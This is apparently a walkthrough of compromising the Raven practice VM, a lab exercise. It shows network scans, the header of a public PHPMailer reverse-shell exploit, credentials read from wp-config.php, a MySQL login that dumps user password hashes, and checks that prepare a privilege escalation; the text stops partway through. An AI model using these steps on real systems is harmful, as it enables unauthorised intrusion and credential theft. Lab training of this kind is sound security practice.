┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:26:ba:69, IPv4: 192.168.3.11 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.3.1 00:50:56:c0:00:08 VMware, Inc. 192.168.3.2 00:50:56:e4:e9:e5 VMware, Inc. 192.168.3.15 00:0c:29:57:62:33 VMware, Inc. 192.168.3.254 00:50:56:e0:91:13 VMware, Inc.
5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.967 seconds (130.15 hosts/sec). 4 responded ┌──(root㉿kali)-[~] └─# nmap -Pn -A -sV -T4 -p- 192.168.3.15 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 08:28 EDT Nmap scan report for 192.168.3.15 Host is up (0.00048s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA) | 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA) | 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA) |_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-title: Raven Security |_http-server-header: Apache/2.4.10 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 34158/udp6 status | 100024 1 35337/tcp status | 100024 1 40500/udp status |_ 100024 1 44525/tcp6 status 35337/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:57:62:33 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.48 ms 192.168.3.15
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds
┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.3.15/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict
""" # Exploit Title: PHPMailer Exploit v1.0 # Date: 29/12/2016 # Exploit Author: Daniel aka anarc0der # Version: PHPMailer < 5.2.18 # Tested on: Arch Linux # CVE : CVE 2016-10033 Description: Exploiting PHPMail with back connection (reverse shell) from the target Usage: 1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033 2 - Config your IP for reverse shell on payload variable 4 - Open nc listener in one terminal: $ nc -lnvp <your ip> 3 - Open other terminal and run the exploit: python3 anarcoder.py Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU Full Advisory: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html """
from requests_toolbelt import MultipartEncoder import requests import os import base64 from lxml import html as lh
www-data@Raven:/var/www/html/wordpress$ grep "password" -rn wp-config.php grep "password" -rn wp-config.php 28:/** MySQL database password */ www-data@Raven:/var/www/html/wordpress$ cat wp-config.php cat wp-config.php <?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'R@v3nSecurity'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8mb4'); /** The Database Collate type. Don't change this ifin doubt. */ define('DB_COLLATE', '');
/**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to login again. * * @since 2.6.0 */ define('AUTH_KEY', '0&ItXmn^q2d[e*yB:9,L:rR<B`h+DG,zQ&SN{Or3zalh.JE+Q!Gi:L7U[(T:J5ay'); define('SECURE_AUTH_KEY', 'y@^[*q{)NKZAKK{,AA4y-Ia*swA6/O@&*r{+RS*N!p1&a$*ctt+ I/!?A/Tip(BG'); define('LOGGED_IN_KEY', '.D4}RE4rW2C@9^Bp%#U6i)?cs7,@e]YD:R~fp#hXOk$4o/yDO8b7I&/F7SBSLPlj'); define('NONCE_KEY', '4L{Cq,%ce2?RRT7zue#R3DezpNq4sFvcCzF@zdmgL/fKpaGX:EpJt/]xZW1_H&46'); define('AUTH_SALT', '@@?u*YKtt:o/T&V;cbb`.GaJ0./S@dn$t2~n+lR3{PktK]2,*y/b%<BH-Bd#I}oE'); define('SECURE_AUTH_SALT', 'f0Dc#lKmEJi(:-3+x.V#]Wy@mCmp%njtmFb6`_80[8FK,ZQ=+HH/$& mn=]=/cvd'); define('LOGGED_IN_SALT', '}STRHqy,4scy7v >-..Hc WD*h7rnYq]H`-glDfTVUaOwlh!-/?=3u;##:Rj1]7@'); define('NONCE_SALT', 'i(#~[sXA TbJJfdn&D;0bd`p$r,~.o/?%m<H+<>Vj+,nLvX!-jjjV-o6*HDh5Td{');
/**#@-*/
/** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_';
/** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');
找到mysql密码
1
R@v3nSecurity
查看进程,mysql是root运行
1 2 3 4
www-data@Raven:/var/www/html/wordpress$ ps aux | grep root|grep mysql ps aux | grep root|grep mysql root 544 0.0 0.3 4340 1640 ? S 18:03 0:00 /bin/sh /usr/bin/mysqld_safe root 913 0.0 10.4 552224 51508 ? Sl 18:03 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
查看历史安装包版本
1 2 3 4 5 6 7 8 9 10 11
www-data@Raven:/var/www/html/wordpress$ dpkg -l | grep mysql dpkg -l | grep mysql ii libdbd-mysql-perl 4.028-2+deb8u2 amd64 Perl5 database interface to the MySQL database ii libmysqlclient18:amd64 5.5.60-0+deb8u1 amd64 MySQL database client library ii mysql-client-5.5 5.5.60-0+deb8u1 amd64 MySQL database client binaries ii mysql-common 5.5.60-0+deb8u1 all MySQL database common files, e.g. /etc/mysql/my.cnf ii mysql-server 5.5.60-0+deb8u1 all MySQL database server (metapackage depending on the latest version) ii mysql-server-5.5 5.5.60-0+deb8u1 amd64 MySQL database server binaries and system database setup ii mysql-server-core-5.5 5.5.60-0+deb8u1 amd64 MySQL database server binaries ii php5-mysqlnd 5.6.36+dfsg-0+deb8u1 amd64 MySQL module for php5 (Native Driver) ii php5-mysqlnd-ms 1.6.0-1+b1 amd64 MySQL replication and load balancing module for PHP
www-data@Raven:/var/www/html/wordpress$ mysql -uroot -pR@v3nSecurity mysql -uroot -pR@v3nSecurity Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 37 Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | wordpress | +--------------------+ 4 rows inset (0.00 sec)
mysql> use wordpress; use wordpress; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
mysql> select * from wp_users; select * from wp_users; +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ | 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael | | 2 | steven | $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad. | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull | +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ 2 rows inset (0.00 sec)
查看是否满足写入条件
1 2 3 4 5 6 7 8 9
mysql> show global variables like 'secure%'; show global variables like 'secure%'; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_auth | OFF | | secure_file_priv | | +------------------+-------+ 2 rows inset (0.00 sec)
mysql> show variables like '%plugin%'; show variables like '%plugin%'; +---------------+------------------------+ | Variable_name | Value | +---------------+------------------------+ | plugin_dir | /usr/lib/mysql/plugin/ | +---------------+------------------------+ 1 row inset (0.00 sec)
查看能否远程登陆
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
mysql> use mysql; use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
